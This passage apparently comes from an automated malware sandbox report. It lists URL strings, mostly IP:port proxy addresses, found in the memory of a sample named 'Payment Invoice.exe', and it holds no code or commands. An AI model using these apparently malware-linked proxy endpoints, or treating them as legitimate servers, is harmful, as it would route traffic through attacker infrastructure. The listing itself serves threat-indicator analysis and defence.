                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.24.102:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.33:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.33:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.42:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.42:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.236.150:999://proxyH
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.184.134:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.184.134:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.108.208:9050
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.108.208:9050://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.111.135:15082
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.111.135:15082://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.4.241:9050
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.4.241:9050://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.99.12
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.99.122:20473
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.99.122:20473://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.134.70:19065
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.134.70:19065://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.21.43:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.21.43:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.225.94:30001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.225.94:30001://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:14669
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:14669://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:17639
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:17639://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:23711
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:23711://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:47056
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:47056://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:48085
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:48085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:54393
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:54393://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:9165
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:9165://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.15.11:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.82.15.11:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.199:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.88.90.199:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.104.150:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.104.150:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.203.186:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.203.186:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E44000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.10.229.243:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.10.229.243:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.102.134:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.102.134:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.160.223:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.5.73:46296
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.101.5.73:46296://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.35.193:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.35.193:80800ku
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.35.193:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.44.29:64523
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.105.44.29:64523://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.161.194.91:8085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.204.147:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.204.147:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.149:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.149:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.151:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.153:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.207.153:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.102:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.209.54.102:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.21.153.16:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.21.153.16:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.22.210.184:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.22.210.184:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A0A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.185:1088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.227.37.185:1088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.23.53.164:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.23.53.164:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.231.72.35:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.231.72.35:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.245.77.52:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.245.77.52:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.249.0.189
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.249.0.189://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.249.0.189:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.25.225:53281
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.250.25.225:53281://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.28.72.75:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.28.72.75:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.35.9.110:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.51.249.135:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.51.249.135:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.98.192.233:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.98.192.233:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.99.252.42:10805
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.99.252.42:10805://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.100.64.189:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.100.64.189:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.113.179.6:10705
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.113.179.6:10705://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.176.213.210:39593
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.176.213.210:39593://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.180.63.37:54321
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.180.63.37:54321://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.229.171.150:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.229.171.150:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.236.85.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.236.85.113:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.236.85.113:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.15.120:15673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.15.120:15673://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.170.85:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.170.85:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.234.237
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.234.237://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.242.234.237:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B2A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.177.210:8088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.243.177.210:8088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.251.34.170:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.251.34.170:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.254.90.125:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.254.90.125:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.56.110.204:8989
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.56.110.204:8989://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.76.163.115:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.76.163.115:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.88.3
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.88.3.19:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.88.3.19:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.91.110.154:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.91.110.154:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.93.121.200
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.93.121.200://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.93.121.200:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.28.170:8004
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.28.170:8004://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.12.126.5
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.12.126.53:51251
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.12.126.53:51251://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.12.126.53:57144
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.12.126.53:57144://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.13.124.150:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.13.124.150:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.156.42.186:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.156.42.186:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.228.131.169:5000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.228.131.169:5000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.249.155.3
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.249.155.3://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.249.155.3:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.254.240.252:21028
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319BF5000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163199EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.4.48.128:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319BFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.4.48.128:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.48.126.12:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.48.126.12:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.10.249.159:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.10.249.159:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.135.137.13:59124
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.135.137.13:59124://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.135.83.214
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.135.83.214://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.135.83.214:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.160.186.110:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.160.186.110:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.103.41:88
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.103.41:88://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.108.72:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.108.72:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.179.239:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.179.239:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.219.13:4228
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.219.13:4228://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.42.131:97
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.42.131:97://proxy
